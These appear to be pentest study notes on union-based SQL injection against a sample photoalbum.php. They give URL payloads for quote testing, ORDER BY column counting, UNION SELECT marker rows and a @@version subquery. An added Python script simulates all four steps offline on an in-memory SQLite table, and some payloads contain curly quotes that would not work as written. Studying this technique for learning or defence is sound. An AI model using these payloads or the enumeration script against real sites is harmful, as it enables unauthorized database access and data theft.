URL enum
#Try:
http://target.com/photoalbum.php?id=1
# A stray quote should break the query (SQL error or blank page) if id is concatenated unquoted
http://target.com/photoalbum.php?id=1'
# Find the column count with ORDER BY: no error means the query has at least 9 columns
http://target.com/photoalbum.php?id=1 order by 9
# Error at 10 means the query has exactly 9 columns
http://target.com/photoalbum.php?id=1 order by 10
#UNION SELECT the same number of columns and note which numbers show up on the page (those positions are the ones you can read data through)
http://example.com/photoalbum.php?id=1 union select 1,2,3,4,5,6,7,8,9
#Also:
#Quoting the values makes them string literals, so they render in place of the page content (MySQL accepts double quotes by default; single quotes work everywhere)
?search=1 union select "1","2","3","4","5","6","7"
#If the page keeps rendering the original row instead of your values, use an id that matches nothing (e.g. 9999) so the original SELECT returns no rows:
?search=9999
#Then the UNION row is the only row left for the page to render:
?search=9999 union select "1","2","3","4","5","6","7"
#Put your own string in a reflected column (column 4 here) to confirm which position reaches the page
?search=9999 union select “1”,”2”,”3”,”FuckYou”,”5”,”6”,”7”
#Replace a reflected column with a subquery to pull data out, e.g. the MySQL version via @@version (see PWK notes); the + is a URL-encoded space
?search=9999 union select “1”,”2”,(select+@@version),”4”,”5”,”6”,”7”
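The whole procedure above (quote test, ORDER BY column count, UNION with markers against a non-existent id, then swapping a subquery into a reflected column), as an added example that is not part of the original notes. It runs offline against a stand-in for photoalbum.php built on an in-memory SQLite table with constructed sample rows; the table, column names and the "first row only" template are assumptions for illustration, and sqlite_version() stands in for MySQL's @@version. Single quotes are used for the string literals because SQLite treats double-quoted names as identifiers first.

```python
import sqlite3

# Constructed sample rows standing in for the target's photo table.
SAMPLE_ROWS = [
    (1, "Beach", "alice", "/img/1.jpg"),
    (2, "Mountain", "bob", "/img/2.jpg"),
]
SQLITE_VERSION = sqlite3.sqlite_version  # what the "@@version" step returns in this stand-in


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos(id INTEGER, title TEXT, owner TEXT, path TEXT)")
    conn.executemany("INSERT INTO photos VALUES (?,?,?,?)", SAMPLE_ROWS)
    return conn


def photoalbum(conn, id_param):
    """Stand-in for photoalbum.php: the id parameter is concatenated into the query
    unquoted (the injection). Like a typical detail page, the template renders only
    the first row and only two of the four selected columns (title and owner)."""
    sql = "SELECT id, title, owner, path FROM photos WHERE id=" + id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return {"error": str(exc), "page": ""}
    page = f"{rows[0][1]} by {rows[0][2]}" if rows else ""
    return {"error": None, "page": page}


def is_injectable(fetch):
    """Step 1: id=1 renders normally, id=1' breaks the query."""
    return fetch("1")["error"] is None and fetch("1'")["error"] is not None


def count_columns(fetch, max_cols=20):
    """Step 2: ORDER BY n succeeds up to the column count and errors at n+1."""
    for n in range(1, max_cols + 1):
        if fetch(f"1 order by {n}")["error"]:
            return n - 1
    return None


def reflected_columns(fetch, ncols, id_value="9999"):
    """Step 3: UNION a row with a distinct marker per column and see which markers
    reach the page. With a real id (1) the original row is rendered and the markers
    never show; with an id that matches nothing (9999) the UNION row is all that is left."""
    markers = ",".join(f"'col{i}'" for i in range(1, ncols + 1))
    page = fetch(f"{id_value} union select {markers}")["page"]
    return [i for i in range(1, ncols + 1) if f"col{i}" in page]


def extract(fetch, ncols, column, expr, id_value="9999"):
    """Step 4: replace one reflected column with a scalar subquery, e.g. the DB version."""
    cols = [f"'{i}'" for i in range(1, ncols + 1)]
    cols[column - 1] = f"(select {expr})"
    return fetch(f"{id_value} union select {','.join(cols)}")["page"]


def run_enumeration():
    """Drive the four steps against the stand-in page and return what was learned."""
    conn = make_db()
    fetch = lambda value: photoalbum(conn, value)
    if not is_injectable(fetch):
        return None
    ncols = count_columns(fetch)
    masked = reflected_columns(fetch, ncols, id_value="1")     # original row wins
    shown = reflected_columns(fetch, ncols, id_value="9999")   # UNION row is rendered
    version_page = extract(fetch, ncols, shown[0], "sqlite_version()")
    return {"columns": ncols, "masked": masked, "reflected": shown,
            "version_page": version_page}


if __name__ == "__main__":
    print(run_enumeration())
```

Against a live target the fetch callable would wrap an HTTP request and return the response body and status, but the logic is the same: the 9999 trick is what turns an empty marker list into the reflected positions, and the extract step then reads any scalar expression through one of those positions.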